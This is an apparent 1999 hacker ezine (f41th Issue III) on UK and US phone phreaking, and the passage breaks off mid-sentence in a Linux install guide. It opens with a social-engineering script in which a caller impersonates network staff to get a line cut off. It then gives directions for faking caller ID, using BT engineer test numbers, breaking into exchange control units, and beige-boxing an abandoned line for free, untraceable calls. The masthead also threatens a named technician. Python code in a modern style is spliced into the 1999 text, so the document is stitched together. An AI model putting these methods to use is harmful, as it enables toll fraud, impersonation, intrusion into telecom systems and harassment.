f41th Issue 03

yyyyyssssyyyy yyyyssssyyyy yyyy yyyy
|lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy
:|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$
:||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$
:::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS
::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l
.:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::|

F41th Issue III [April 1999] D4RKCYDE tHE cOLLECT1VE
darkcyde.8m.com
#darkcyde EfNet.

Contents:

--> Editorial. By hybrid <-----Ooo---
--> CLID Faking. By TheDohBoy <-----Ooo---
--> Fone Technologies Of The New Millennium. By TheDohBoy <-----Ooo---
--> Local Exchange Phreaking. By TheDohBoy <-----Ooo---
--> How Brakis Got A Phree Fone Line. By TheDohBoy <-----Ooo---
--> Installing Linux, how to get it werking. By Bodie <-----Ooo---
--> Overview of some common exploits. By Bodie <-----Ooo---
--> The ShivaLanRover System (@ Userid:) By hybrid <-----Ooo---
--> How to be 3l337 in 10 Easy Steps. By Force <-----Ooo---
--> BT Network Tones and Announcements. By Force <-----Ooo---
--> UK Hand Scan of O8OO 919. By Force <-----Ooo---
--> The SS7 telephony protocol. By hybrid <-----Ooo---



.. .... .. " Richard, CO, how can I help you? " .. ....
Hi, this is Mike up in network administration,
Just calling to confirm the problem with the
network maintenance on stack 82 of your router.....
" Yes, the problem was fixed about 30 minutes ago,
apparently there was a problem with the
smps..... "

Sure.. listen, we've set up a routine output port
on 512 XXX XXXX, emitting 300 Hz every 12 Ms, can
you check that the line is still functioning?... ..
" No, it appears to be a standard line.. ... "
OK Richard, we'll set another one up in about 15
minutes, in the mean time terminate the line and
I'll call you back soon to confirm the stack emitter. ..
" No problem, I'll reset the asp... "
<click>
.. ...... .. 512 XXX XXXX... " We're sorry, the number you
have called has been disconnected, no further
information is available about this number "
... ...

(bye bye)

---(OOooOO)-------------------------------------------------------------(OOo-
---(OOooOO)---[supreme f41th diplomatic editor in chief]-----[hybrid]---(OOo-
---(OOooOO)---["find me on the PSTN bitch"]----[th0rn@coldmail.com]-----(OOo-
---(OOooOO)---[el8 minister of foreign espionage]------------[downt1me]-(OOo-
---(OOooOO)---["..__... _ ...__.."]--[downtime@webcrunchers.com]--------(OOo-
---(OOooOO)---[crack cocaine p1mp]---------------------------[alph4vax]-(OOo-
---(OOooOO)---["i be the king of buffer overflow"]----------------------(OOo-
---(OOooOO)---[supreme master of beaste boy quotes]----------[force]----(OOo-
---(OOooOO)---["i jumped outside with my walkman on..."]----------------(OOo-
---(OOooOO)---[bagpipe player, and haggis master]------------[doh-boy]--(OOo-
---(OOooOO)---["bollocks"]----------------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-
---(OOooOO)---[elf]--[tonekilla]--[mortis]--[bishopof_hell]--[zomba]----(OOo-
---(OOooOO)---[digital_fokus]--[s1nt4x]--[angel]--[mistress]--[lowtek]--(OOo-
---(OOooOO)---[digiphreak]----------[darkcyde.8m.com]-------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-

---(Oo)----[elite]:

telnet/ftp: fedworld.gov, even more elite: ch1ckie. Yugoslavian h4x0rz &
h4x-wh0r3z. Beaste boyz, blur 13. Guano Apes 'lords of the boards'..

---(Oo)----[lame]:

people who find it amusing to live out their pointless existence taking over
irc channels. PLUK. mrsp00n. AT&T conf lamers. Mr Clinton of the wh0re house.
Propaganda and patriotic Bill Clinton speeches, not forgetting Mr Blair.
lamer still: PBX whorez who call themselves phreaks. Lame as shit: 'cooldave'
...cooldave is one of the latitude techs who maintain meetingplace
confs, don't fuck with us bitch./ we got your land line number, registration
plates, SS number, family medical history, we even know the brand of your
fucking toothbrush.


---(OOooOO)--------Editorial--------------------------------------------(OOo-
---(OOooOO)--------by hybrid--------------------------------------------(OOo-
---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo-


f41th has finally begun to take off. When we first came up with the idea of
producing an ezine we never thought we would get to issue 3, but now we
intend to keep going. The idea of f41th is to create an ezine that is aimed
at the American as well as UK h/p scene. f41th is not intended to be a raw
information resource, but is supposed to be entertaining to read at the same
time. We still need more people to submit articles for f41th, so if there is
anyone out there who wishes to have an article appear in our zine, just email
anything to me or any of the d4rkcyde members. I can be emailed at many
addresses, but mainly th0rn@coldmail.com. The d4rkcyde website is still
undergoing maintenance, and we hope it will be back up and running properly
soon; to visit our site go to darkcyde.8m.com. The other day someone called
f41th a 'wanna-be' zine. I'd like to say we are not trying to be like anyone,
we are just producing a zine that is useful to both UK and US audiences.
Apart from that comment, we have had quite a lot of good feedback from various
people, and I'd like to say werd to everyone who has commented on the zine with
a more positive flavour. Anyways, that's my short editorial over, hope you
enjoy f41th 3, WERD.


---(OOooOO)--------cLID Faking------------------------------------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-


OK, in this article I'm going to cover the basics of CLID (Calling Line
IDentification) and how it affects the humble phreak.

CLID Is Different From ANI!!!

A lot of people get confused about the difference between these. ANI is an
age old ID method which is only accessible by your local exchange. It's
basically a test of voltage levels in your local loop to see "who's making a
call right now". As you can see, anyone outside your exchange has to "trace"
the path of the call through a maze of trunk lines. For the local exchange,
the loops are grouped into "pools" of certain numbers. So say your number was
123456 (well, for a start you're lucky to have such a memorable number!), but
how does the exchange work out your number? The main "pool" you are a part
of is the 1 pool. This consists of all numbers beginning with 1 in the
exchange. This then splits off into sub-pools, like 10, 11, 12. So after
going through six sub-pools your unique number is reached. This is how 175
works for reading out your number (on System X), so if you dial 141 then 175
it will have no effect. CLID is digital information (derived from ANI
initially) which is sent from exchange to exchange, and occasionally on to
subscribers with the CLID service. This can be withheld by dialling 141 in
the UK, or by using star services in the US. 17070 works using this.


How can I stop ANI going out on normal calls?

Well the method of diverting (just getting an op to connect you to the
number) gets rid of both ANI and CLID. The ANI disappears completely, and
the CLID is what is known as the generic packet. No info about you can be
given from this packet.

ANI and call logging.

Call logging is done at your exchange and this shows all numbers you have
dialled. So even if you dial 141 before dialling you can get snared by the
caller log. Diverting only shows that you have made an operator call, and
loads of people are dialling the op at once, so this is a good solution to
that problem.

OK, I can get rid of all my ANI/CLID/Caller Log info, but can I fake my CLID
so that I look like someone else?

The good news is that you can with a little knowledge of CLID protocols, and
maybe some programming knowledge. What you need is a program that can
transmit given CLID information to CLID Units (the ones that show
residential/business customers the number before they pick up). How these
units work is that they listen on the line for a warning tone from the
exchange, and then a modem receives the CLID info before the fone rings. All
this takes place in a fraction of a second.

So all that is required is such a program. And the following method:

1) Divert through an op to call the number you wish (or dial 141 at least)
2) Wait for pick up, and when they go off hook, send the CLID packet
3) Do what you want

How this looks at their end is as follows:

1) Fone rings and CLID unit says "Operator call" or "Number withheld". They
then pick up the receiver (and possibly hear a "cheep")
2) The unit then shows the fake number on its screen.

This is perfect for 0800 numbers, because they have CLID units. It's also good
for ISPs, and even certain telephone companies!! What won't be fooled is
1471, but if you've done it right then there will be no number there.
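To make concrete what the "CLID packet" above actually carries, here is an added example, written for this edition and not code from the zine or from any CLID unit vendor, that decodes a caller-ID message the way the modem inside a CLID unit would after the alert tone. It models the Bellcore SDMF/MDMF framing used in the US; that choice is an assumption for illustration, since BT's own framing differs in detail. The sample frames are constructed and the function names are mine. The thing to notice is that the only check the receiver can make is an 8-bit checksum, which catches line noise and nothing else: a frame that passes it carries no proof of where it came from, which is exactly why the display on a CLID unit, an 0800 service or an ISP's dial-in should never be treated as authentication of the caller.

```python
# Added example, not code from the zine: decode a caller-ID message the way the
# modem in a CLID unit would after the alert tone. Bellcore (US) SDMF/MDMF
# framing is assumed for illustration; sample frames below are constructed.
from typing import Dict

SDMF = 0x04   # single data message: fixed date/time + number
MDMF = 0x80   # multiple data message: tagged parameters
PARAM_NAMES = {0x01: "datetime", 0x02: "number", 0x04: "number_absent",
               0x07: "name", 0x08: "name_absent"}


def checksum_ok(msg: bytes) -> bool:
    """The only integrity check in the frame: all bytes, including the trailing
    checksum byte, sum to zero modulo 256. Detects line noise, not forgery."""
    return len(msg) >= 3 and sum(msg) % 256 == 0


def decode_clid(msg: bytes) -> Dict[str, str]:
    """Return the fields a CLID unit would show. Raises ValueError on a
    malformed or noise-damaged frame."""
    if not checksum_ok(msg):
        raise ValueError("bad checksum or truncated frame")
    mtype, length = msg[0], msg[1]
    body = msg[2:-1]
    if len(body) != length:
        raise ValueError("length byte does not match frame")
    fields: Dict[str, str] = {}
    if mtype == SDMF:
        fields["datetime"] = body[:8].decode("ascii")   # MMDDHHMM
        fields["number"] = body[8:].decode("ascii")
    elif mtype == MDMF:
        i = 0
        while i < len(body):
            if i + 2 > len(body):
                raise ValueError("truncated parameter header")
            ptype, plen = body[i], body[i + 1]
            pdata = body[i + 2:i + 2 + plen]
            if len(pdata) != plen:
                raise ValueError("truncated parameter data")
            name = PARAM_NAMES.get(ptype, f"param_{ptype:02x}")
            fields[name] = pdata.decode("ascii")
            i += 2 + plen
    else:
        raise ValueError(f"unknown message type 0x{mtype:02x}")
    return fields


def display_text(fields: Dict[str, str]) -> str:
    """What the unit's screen would show for the decoded fields."""
    if "number_absent" in fields:
        return "NUMBER WITHHELD" if fields["number_absent"] == "P" else "OUT OF AREA"
    return fields.get("number", "NO NUMBER")


# Constructed sample frames; checksum bytes precomputed so sum(frame) % 256 == 0.
SAMPLE_SDMF = bytes([SDMF, 0x0F]) + b"04011200" + b"5551234" + bytes([0xFC])
SAMPLE_MDMF = (bytes([MDMF, 0x1A])
               + bytes([0x01, 0x08]) + b"04011200"
               + bytes([0x02, 0x07]) + b"5551234"
               + bytes([0x07, 0x05]) + b"ALICE"
               + bytes([0xF9]))
SAMPLE_WITHHELD = (bytes([MDMF, 0x0D])
                   + bytes([0x01, 0x08]) + b"04011200"
                   + bytes([0x04, 0x01]) + b"P"
                   + bytes([0x8D]))
# One digit altered by line noise without the checksum changing: rejected.
SAMPLE_DAMAGED = bytes([SDMF, 0x0F]) + b"04011200" + b"5551235" + bytes([0xFC])

if __name__ == "__main__":
    for frame in (SAMPLE_SDMF, SAMPLE_MDMF, SAMPLE_WITHHELD):
        fields = decode_clid(frame)
        print(display_text(fields), fields)
    print("damaged frame passes checksum:", checksum_ok(SAMPLE_DAMAGED))
```

The damaged frame is rejected only because its checksum no longer adds up; anything framed consistently decodes and displays just like a frame from the exchange, which is the whole weakness the article is exploiting.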

That's all I can think of now, maybe we'll see a good proggie spring up to
help us soon!


---(OOooOO)--------Phone Technologies of the new millennium-------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-


Pretty snappy title huh.. Well in this article I hope to focus on
technologies which are yet to make their way to the end user. I'll be taking
the point of view of a phreaker who wants to know the possible loopholes of
the technologies.


Wavelength Division Multiplexing.

A really great technology which could cut the cost of calling by pretty much
100%. Everyday multiplexing is done using the TDM (Time Division
Multiplexing) technique. This technique allows multiple subscriber to
subscriber calls to utilise the same trunk lines. An illustration to show
how this works follows:

Call 1: (First in line) ------------\
                                     \
Call 2: (second in line)-------------------Single trunk line holding *1* call
                                     /     at any time
Call 3: (Third in line)-------------/

Realistically the line numbers would not have a one to one correspondence
with their order in the queue. This would be allocated using an algorithm
stored on switching equipment. The usage of the network is never 100% and so
the loss in quality of the calls is *very* minimal. As one can see this
method will have its problems. There is an upper bound on the call capacity
set by the sampling rate of the sound levels at the subscriber's fone and the
number of subscribers using the line at any one time. The upper limit varies
directly (assuming that the number of callers at the peak is roughly
constant) as the sampling rate. One way to overcome this is to use separate
wavelengths for separate calls (or TDM lines). This means that each WDM line
can carry a multiple of the equivalent TDM lines. This means the cost to the
end user should vary directly as the cost of TDM and inversely as the
equivalent number of TDM lines per WDM line. Local calls (in the UK) are
already 1p per minute for a standard line so even a small WDM/TDM ratio could
see calls becoming *extremely* cheap. The fone will become just another
utility which can be left on all day (much as electricity is now). There are
two main pitfalls which I can think of about this technology. Firstly there
is the problem of interference from other calls. This effect will be much the
same as radio interference causing call quality to drop. A possible solution
would be to allocate wavelengths based on prime numbers. These would not be
harmonics of any other signal in the wire, stopping interference almost
completely. Phases can be allocated randomly also to prevent interference.
Another is the limited spectrum available. Due to the photoelectric effect
most of the signals will have to be sent (along fibre optic cable) at a
wavelength particular to the materials used in the detectors. If digitally
encoded, the transfer rate (although HUGE) will be limited by the switching
times of the semiconductor equipment at the other end. An advantage for the
telcos is that conference call facilities can be made just by "tuning" three
calls into one wavelength on a specific line. No doubt this could be taken
advantage of to listen in on others' conversations or step up trunks e.t.c. I
would expect also that inter-office signalling would travel on the same lines
as consumer calls. Perhaps if telcos are thick enough to put them at the
lower end (where the density of calls is greater) these can be "tapped" by
phreaks. I think that covers most of what phreaks need to know about WDM.
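As an added illustration (not part of the article), the following model implements the TDM trunk in the diagram above and the capacity bound the article states: one sample per call is interleaved into each frame, the far end pulls its slot back out of every frame, and the number of calls a trunk of a given bit rate can carry follows from the sampling rate and sample width, which WDM then multiplies by the number of wavelengths. The trunk figures and sample streams are constructed and the function names are mine.

```python
# Added example, not from the zine: a toy model of the TDM trunk described
# above. Each call contributes one sample per frame; the frame repeats at the
# sampling rate, so the trunk bit rate caps how many calls fit. WDM multiplies
# that cap by the number of wavelengths. All figures below are constructed.
from typing import List


def tdm_capacity(trunk_bps: int, sample_rate_hz: int, bits_per_sample: int) -> int:
    """Calls one TDM trunk can carry: each call consumes sample_rate * bits bit/s,
    so the bound moves with the sampling rate, as the article says."""
    return trunk_bps // (sample_rate_hz * bits_per_sample)


def wdm_capacity(trunk_bps: int, sample_rate_hz: int, bits_per_sample: int,
                 wavelengths: int) -> int:
    """The same fibre carrying one full TDM stream per wavelength."""
    return wavelengths * tdm_capacity(trunk_bps, sample_rate_hz, bits_per_sample)


def tdm_mux(calls: List[List[int]], slots: int) -> List[int]:
    """Interleave the calls' samples into frames of `slots` samples each.
    Unused slots carry 0 (an idle channel). Refuses more calls than slots."""
    if len(calls) > slots:
        raise ValueError(f"trunk full: {len(calls)} calls for {slots} slots")
    frames = max((len(c) for c in calls), default=0)
    stream: List[int] = []
    for f in range(frames):
        for s in range(slots):
            have_sample = s < len(calls) and f < len(calls[s])
            stream.append(calls[s][f] if have_sample else 0)
    return stream


def tdm_demux(stream: List[int], slots: int, n_calls: int) -> List[List[int]]:
    """Recover each call by taking its slot out of every frame."""
    if len(stream) % slots:
        raise ValueError("stream is not a whole number of frames")
    return [stream[s::slots] for s in range(n_calls)]


if __name__ == "__main__":
    # E1-style trunk: 2.048 Mbit/s carrying 8 kHz, 8-bit samples -> 32 slots.
    print("TDM calls per trunk:", tdm_capacity(2_048_000, 8000, 8))
    print("with 16 wavelengths:", wdm_capacity(2_048_000, 8000, 8, 16))
    calls = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]      # constructed sample streams
    trunk = tdm_mux(calls, slots=4)
    print("trunk stream:", trunk)
    print("recovered:   ", tdm_demux(trunk, slots=4, n_calls=3))
```

Halving the sampling rate doubles the call count from the same trunk, which is the "varies directly as the sampling rate" relationship in the text; the mux refusing a fifth call on a four-slot trunk is the upper bound it describes.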


Telefony Over The National Grid.

Another high bandwidth technology (which may even incorporate the above
system) which could see the cost of calling drop. I doubt this will ever get
off the ground personally. BT/AT+T will see their profits at risk and will
try anything to stop this technology taking hold. Basically how this works is
to send signals over the electric distribution system. A pretty good idea,
especially as the system can provide high bandwidth on a system already
present in people's homes. One obvious advantage to telcos involved would be
that it would stop beige boxers :> (clip clip, ring ring, fry fry!!!!) Up to
subscriber level the system is bound to be similar to the structure of the
PSTN system, i.e. sub-units acting as exchanges e.t.c. It will look quite
similar to the normal fone network.

IP Telefony.

Notable in that it's already in existence. To check out a good example go to
www.net2phone.com and download the software. That gives you 1-800 access and
a complimentary bundle of minutes. This is the use of the internet to conduct
voice telefony. It can be thought of as a gateway between the internet and
the PSTN (although some applications of this only go net-net). This makes
calling international as cheap as a local call to your ISP so that can't be
bad. Things like NetMeeting and Netscape Conference/Cooltalk are already in
use and are free to use. BT already feels threatened and is ploughing a lot of
money into this technology in order to save its market share. As for call
quality I think it's about as good as a digital mobile driving down the M1 at
100mph in that the volume varies considerably. This is due to the packet
technology in use on the net. Good news for hackers is that the servers can
probably be hacked and used to route calls through. Also, AT+T are providing
an IP Conference call system (Free for ten minutes during the Superbowl). This
will allow you to put in numbers, and then call them all at once using your
computer. Check around on the net for such things, they are growing steadily!


Videoconferencing.

Aaaahh.....Takes me back to when I was at a BT exhibition in 96/97 when they
had their videofones on display. Of course they had two set up to allow two
people to talk on them. What they forgot was that if you hung up you could
dial out on them. So if BT can be that stupid well who knows! Anyhoo, back to
videofones. Businesses are increasingly using these as they provide an ideal
solution to the problems of teleconferencing, i.e. talking over someone else.
No doubt as the service expands in bandwidth perhaps TV and the net may
integrate into this service, providing a one stop comms shop as it were. No
doubt BT would charge a premium for this kind of thing!!!


GPS Cellfones

Dangerous technology for the phreaker if this becomes de facto. Think of the
ability of an operator being able to trace not only your number but *exactly*
where you are!!! Very bad stuff.

Free Local Calls In The UK

Finally in 2000 (approx. when OFTEL takes the restrictions from BT) we can
take a leaf from the book of our American phriends and learn how to step up
trunks and so on. Local PBX hacking will become normal and the appeal of
Meridian Systems may wane slightly. Perhaps a way can be found to busy out
certain routes and make the switching systems hand you off up the trunk, a
few key presses later and you can make a free call anywhere!!! The weak link
there is trying to block certain paths through the system. I'm looking
forward to this (he says rubbing his hands together)


---(OOooOO)--------Local eXchange Phreaking-----------------------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-


Engineer Line Testing
---------------------

This is info I stole from a guide sheet for BT Engineers. It basically gives
them a list of numbers which they can use for testing lines/recording line
activity e.t.c. This can come in useful for the phreak intent on controlling
certain aspects of someone's line. Some of this may have been covered in other
articles, but I think the stuff on ASU's is relatively new.


Testing On System X
-------------------

Subscriber Automatic Line Test (SALT)

175 - Voice read out of number, follow prompts

01 Dial test
02 Power down line (shuts line down for 3 min. also wipes ANI)
6 Partial recall
7 Full recall, returns administrative DT
06 Power down exchange (I've never seen it happen btw!)
No response - New DT

Cable Pair Identification

176 Followed by full area code and number of line on which tone is placed.
Should get NU Tone; this means successful placing of tone on the line.


Testing On System Y
-------------------

Subscriber Automatic Line Test

175 - Fast engaged tone/interrupted dial tone

Commands same as System X

BT Linetest Facility

This is a doosie of a number, it was covered in last months issue of SWAT so
I am technically repeating this but........

17070 - Read out number (if no CLI no readout)

1 For ringback, 2 for quiet line, 3 for fasttest, 4 for fasttrans, or clear
down.

1 Rings back upon clear down
2 Gives quiet line for testing LN
3 Gives ring back line test, Line test, Cable Pair Identification e.t.c.
4 Recording of test results
Clear Down = Hang Up


ASU's
-----

OK so you're asking what the hell an ASU is. It's basically the main control
point for that local area code. Not all exchanges keep these in the range I
am specifying but do some scanning and you should find them. ASUs allow
switching engineers to control the main features of the switch from a remote
fone. I don't have to spell out what this means for the phreak.

ASUs in most exchanges are found at <area-code> <exchange-code> 9999.
They should present you with a message requesting a pin. You may need to
sleep with a BT employee to get one of these. You could war dial one, but for
god's sake NOT FROM YOUR HOME FONE. Once inside you can check the volume of
calls coming through the exchange, perform house cleaning tasks on the
switch, mess around with lines. You name it. Hack one of these and you will
become 31337. An interesting point I might like to make about these numbers
is that they automatically step you up to <Trunk Level 0> or STD level. This
means if you dial your local ASU you will be stepped up to National level.
Find a break signal like on 175 (after ring back flash hook) then you can
mess around on national lines for local rates.


Fiddles
-------

These are fixes put in the circuit by fraudulent engineers wishing to exploit
their position. They hide these in the 17x range and they are unique to each
exchange. There are only 10 numbers to look through. They are usually hidden
behind NU tones or "sorry........" messages. Mess around on each number till
you find a fiddle. You should be able to make free calls off these, or
possibly access looped lines. Either way, corruption in a powerful
organisation is inevitable, ABUSE IT. If you find a fiddle and want to use it
outwith your own exchange you're going to have to either find a PBX in your
area in the 0800 range or hook a black/beige/gold box combo and dial through
that.


CSS's
-----

The Holy Grail of numbers. If you find this you will become more 'leet than
Captain Crunch, Whistlin' Joe, Onkel Deitmeyer, and Alexander Graham Bell put
together. You can do SHIT LOADS with this number. You can even check up on
line records of any number in that area and see the caller log. There are
dial ups on PSTN and over the net through a special BT server. I also believe
there are dial ups on PSS/Featurenet. To find a CSS you may have to know a
BT employee or if you don't it'll take LOADS of scanning, hacking, and heart
attacks over your local exchange. Scanning in your local prefix is always a
good bet.


Exchange Dial Ups
-----------------

Your local exchange WILL have a modem dial up on PSTN or PSS/Featurenet. Once
you have found this you can access fun things. Tracing calls is rather easy
from these. Changing Line status and so on is also easy.


Weeuurd Stuff!!!
----------------

I found a severely weird number on a 373 scan I did myself. It's 0800373983.
It's exactly the same as 17070!!! What's weird is that I can dial it from non-
BT fones (including my Orange JustTalk) and use it to test lines (great for
beiging). It'll probably die now that it's in the Public Domain but hey! why
not share.


Wrap up
-------

That's all I know on the subject of local exchange phreaking at the moment.


---(OOooOO)--------How Brakis got a free fone line----------------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-


What is documented here is the result of a group of four phreaks fucking
about with a mate's fone line. The techniques enclosed are not only accessible
to the 'leet, anyone can use them. Basically, this is how we got Brakis a
phree, untraceable fone line. Brakis *used* to be with BT but hated them so
much that he moved to a competitor (No names mentioned). Naturally when he
switched BT came and took his fone line off. I might mention of course that
he did have two BT lines, and now has one (legit) BT line which is a business
line. Well when we started off we were on the jolly side of drunk and had the
idea of Beiging Brakis' old line. ODC had the great idea of checking the line
length using 17070. He did this from my Orange Mot. c520 (I have a 17070
dialup, I ain't making it public, mail me if you want it). The test came back
and the line length was 2.4km. This was odd because the distance from Brakis'
house to the local BT Xchange was about 2.4km!!! So ODC reckoned that the
line was terminated INSIDE BRAKIS' HOUSE!!! After fixing the second line
after we screwed it up a bit, we hooked our Beiges onto the terminated wire
pair. THERE WAS A DIAL TONE!!! We tried dialling a few 0800's but got
nowhere, then we dialled 100 and got through!!! We could get the op to
connect us to wherever we wanted. We then called it on the cellfone to check
to see if it could get a call back trace. We got: "Sorry, the number you have
dialled is not available". There was no CLI on the line, it couldn't get
traced, and it was FREE. It's the perfect line!!! You can follow more or less
what we did for yourself if you want a fone line for phree. Just use 17070 to
test your old lines; if BT were as stupid as they were in our case, you can
get yourself a line. Cheers!!!


---(OOooOO)--------Linux, how to get it werking-------------------------(OOo-
---(OOooOO)--------by Bodie---------------------------------------------(OOo-
---(OOooOO)--------bodi3@usa.net----------------------------------------(OOo-


I don't care what anyone says, you can't be a hacker unless you have some
form of unix on your machine; how are ya gunna do anything with the iron grip
of windoze on your computer? This file will describe how to get linux on
your machine and get up and running.

Most people now want to dual boot with both windows and linux on their
system; this is what i use, because no matter what people say there are
programs that can only be run in windoze and some of these can be extremely
useful. If you want to do this, take my advice and ignore all the windows
documentation: you need to install windows first and then install linux on top
of that. The reason for this is that windows doesn't play well with others
(it doesn't really play well with anything else full stop, but that's another
story).

**************
*****NOTE*****
Installations of linux vary widely in their setup procedure, make sure you
read the manual first if you have any problems. If that doesn't solve it,
feel free to mail me and i'll see what i can do to help
**************


After you have done this you will need a copy of partition magic, I think
this is shareware now but if you can't find a copy, mail me and i'll get one
to ya. Once you have partition magic installed, you will need to set up 2
partitions for linux, one will be a swap partition - and the other will be
the main linux partition. Many people have different opinions about how big
the swap partition should be, but i have one about 100Mb and that does me
fine. The main partition should be as large as you can make it. The
important thing at this stage is to leave both partitions unformatted.
Partition magic doesn't currently have support for linux partitions and you
will be able to format them later during the installation of linux.

The next thing you will need to do is to make a boot disk, if you bought a
copy of linux it is likely that boot disks came with it, if you got a copied
version or got it any other way, you won't have a boot disk. Creating a
boot disk is different on each version of linux, normally there will be a
utility that you can access from windows or dos that will allow you to create
one easily (look under the directory /dosutils or something similarly named,
if you have any problems mail me and i'll see what i can do). Once you have
done this you will need to reboot the machine with the boot disk in the drive
(make sure you have floppy booting enabled in the BIOS else this won't work)
and the linux CD in the drive. You will now boot into linux.

**************
**IMPORTANT***
Make sure you have the full spec of all your hardware with you at this point
**************

This is where each different version of linux has a different installation
procedure. I have installed Slackware, Red hat and SuSE and they have all
had wildly different user interfaces for the installation procedure. Basically
all you have to do at this stage is tell the system what partitions you have
on your hard drive, what swap partitions you have made and which partition
will be used as the main partition for linux, then it will format both the
swap drives and main drive for the linux file system. You can also access
DOS drives from linux (something which is not easy to do in windoze), you just
have to tell linux where to find the partitions.

**************
*****NOTE*****
The hard drive labelling is very different than the labelling used in windows.
All linux devices are contained within a directory called '/dev'. The first
partition on the primary hard drive is labelled '/dev/hda1'. The second
partition is labelled '/dev/hda2' and so on. If you have a second hard drive
it is labelled '/dev/hdb'. This may seem strange to anyone who has been using
DOS, but it means that a linux system may run under what is called a single
root system. This means that there is 1 top level directory called '/' and
all the directories are below that. Hard drives can be accessed by mounting
them in a directory. This creates a link between the device in /dev and the
directory the drive is mounted in. You must specify a directory where they
will be mounted at install time, then accessing a separate drive will be just
like accessing another directory.
**************

Next you will probably see a list of programs that you can install if you
want to. What you want to install is up to you but you may want to install a
lot of programming tools so you can install other packages that may require
libraries that are contained in these packages. Next just sit back, make a
cup of tea and watch it install. Reboot and you've got a linux system up and
running....Congratulations :)

Once you have done this take a look around the file systems, try out some
commands. Some of the main commands in linux are:

cd <directory> - same as DOS, change directory
mv <source> <destination> - Move a file (as there is no rename command in
linux, this serves as a good alternative)
cp <source> <destination> - Copies a file
ls - Lists the contents of a directory (similar to dir in DOS)
more - This basically prints out any input it gets, a very useful program
crypt - This is possibly the most useful program in unix, it encrypts files so
even the sysadmin can't read them, any sensitive information on a foreign
system or even your own system should be encrypted

I could spend my whole life explaining all the various commands available,
but i'm not gunna do that, 'cus you can look that up in a book if you want to
use them. One more interesting feature of linux is input redirection. This
allows you to pipe input from one program directly to another. One of the
most common examples of this is:

ls | more

This uses the '|' character to redirect output from the ls program to more.
This is often used when there is a long directory listing: ls displays the
output so fast that no one could read it, but more allows you to read output
one screen at a time. The other redirection characters are '>' which
allows you to write the output to a new file, and '>>' which allows you to
add the output to the end of a file that already exists.

As i said earlier, the file system in linux is very different from the
windows file system. A simplified version of the file system is shown here:

                 / (ROOT)
                     |
       -----------------------------
       |         |         |       |
     /bin     /users     /etc    /dev
       |         |         |       |
      ...       ...       ...     ...

There may be many other directories as well, but these are the main ones. The
'/bin' directory contains all the executable programs that are available to
users of the system. Sometimes a link to another location is put in here so
the file is executable from the /bin directory, but it is stored somewhere
else on the system. Sometimes programs are also stored in the '/usr/'
directory.

The '/users' directory is used for storing user areas. This is where
individual users store all their files (unless you need to be using the root
account it is a good idea to use a normal user account, to avoid accidental
damage to files and, if you are on the net, to avoid making it easier for
another hacker to hack your system).

The '/etc' directory is where all the config files are stored for the system.
This directory contains the passwd file (and in some cases, the shadow file).
It stores the files that the system reads as settings for various programs.
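Since the passwd file is the first thing anyone reads on a box, here is an added example (not the article's code) that audits one the way a sysadmin would once the machine is on the net: accounts whose hash is still sitting in the world-readable passwd file instead of the shadow file, accounts with an empty password field, and every account with UID 0. The sample file is constructed and its hash is a dummy string; the function names are mine.

```python
# Added example, not from the zine: audit a passwd file for hashes that never
# made it into the shadow file, empty password fields, and extra UID-0 accounts.
# SAMPLE_PASSWD is constructed; the "$1$..." hash is a dummy value.
from typing import Dict, List

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/sbin/nologin
bodie:x:1000:1000:Bodie:/home/bodie:/bin/bash
guest:$1$dummysalt$dummyhashvalue000000:1001:1001::/home/guest:/bin/sh
oldacct::1002:1002::/home/oldacct:/bin/sh
toor:x:0:0::/root:/bin/sh
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
# 'x' means the hash lives in /etc/shadow; '*', '!' and '!!' mean login disabled.
SHADOWED_MARKERS = {"x", "*", "!", "!!"}


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split every non-empty line on ':' into the seven passwd fields."""
    entries: List[Dict[str, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(parts)}")
        entries.append(dict(zip(FIELDS, parts)))
    return entries


def unshadowed_accounts(text: str) -> List[str]:
    """Accounts whose hash is readable by every user of the system."""
    return [e["name"] for e in parse_passwd(text)
            if e["passwd"] and e["passwd"] not in SHADOWED_MARKERS]


def passwordless_accounts(text: str) -> List[str]:
    """Empty password field: the account can be entered with no password."""
    return [e["name"] for e in parse_passwd(text) if e["passwd"] == ""]


def uid0_accounts(text: str) -> List[str]:
    """Every UID-0 account is root, whatever it happens to be called."""
    return [e["name"] for e in parse_passwd(text) if e["uid"] == "0"]


if __name__ == "__main__":
    print("hash in passwd:", unshadowed_accounts(SAMPLE_PASSWD))
    print("no password:   ", passwordless_accounts(SAMPLE_PASSWD))
    print("uid 0:         ", uid0_accounts(SAMPLE_PASSWD))
```

Feed it the contents of /etc/passwd instead of SAMPLE_PASSWD to check a real system; on a properly shadowed box the first two lists come back empty and the third holds only root.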

The '/dev' directory is the place where all the devices that the system uses
are stored. This includes the mouse, keyboard, hard drives and lots of other
things; the basic idea is that when a device wants to input anything into the
computer, it puts the data in these files, then the system captures this data
and uses it. When data has to be output to a device, it is put in one of
these files and then is sent by the system to the device. This may seem a
complex way of doing things, but in actual fact, it makes it a lot easier for
